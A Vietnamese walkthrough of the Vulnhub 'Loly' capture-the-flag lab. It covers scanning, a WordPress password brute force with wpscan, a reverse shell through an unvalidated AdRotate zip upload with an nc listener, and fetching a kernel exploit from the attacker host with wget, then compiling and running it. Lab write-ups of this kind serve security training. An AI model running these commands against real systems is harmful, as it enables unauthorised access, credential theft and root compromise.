g03m0nVulhub - Loly
Description
Link lab tại đây
Step
Reconnaissance
Đầu tiên ta sử dụng arp-scan để quét các địa chỉ IP có trong dải mạng.
Nhận thấy có một IP lạ là 192.168.134.135.
Sử dụng nmap để kiểm tra các dịch vụ đang mở trên IP đó
Có cổng 80 đang mở và đang sử dụng nginx 1.10.3.
Enumeration
Tiến hành quét các directory bằng dirb
dirb 192.168.134.135
Ta thu được kết quả trang web này sử dụng Wordpress tại endpoint /wordpress.
Giao diện chính của trang:
Giao diện login:
Tiến hành brute force username/password bằng cách sử dụng wpscan.
Đầu tiên ta tìm username:
wpscan -url http://loly.lc/wordpress
Ta thu được username là loly.
Brute force password bằng query:
wpscan -url http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
Thu được mật khẩu: fernando
Tiến hành đăng nhập
Exploitation
Đây là giao diện chính của trang web:
Ta có thể thấy trang web sử dụng 1 plugin có tên là AdRotale version 5.8.6.2. Version này cho phép người dùng upload file zip và giải nén mà không có bất kỳ một phương thức kiểm tra nào:
Ta có thể tận dụng lỗ hổng này để upload reverse-shell . Mở cổng 9001 trên máy attacker bằng query:
nc -nvlp 9001
Bây giờ, truy cập PHP reverse shell bằng cách load lại trang web như hình dưới đây:
Thành công
Có thể nâng cấp shell này python pty:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Sau đó thử grep với từ khóa loly ta tìm được mật khẩu DB có trong file wp-config.php là lolyisabeautifulgirl
Privilege Escalation
Đầu tiên, ta thử kiểm tra phiên bản kernel của machine
uname -a
Đây là một phiên bản khá cũ, thử tìm mã khai thác trên google thì thấy một mã khai thác trên exploit-db:
Ta wget nó về và compile:
wget http://192.168.134.134:8000/ex.c
gcc ex.c -o ex
chmod 777 ex
Thực thi file ex bằng query:
./ex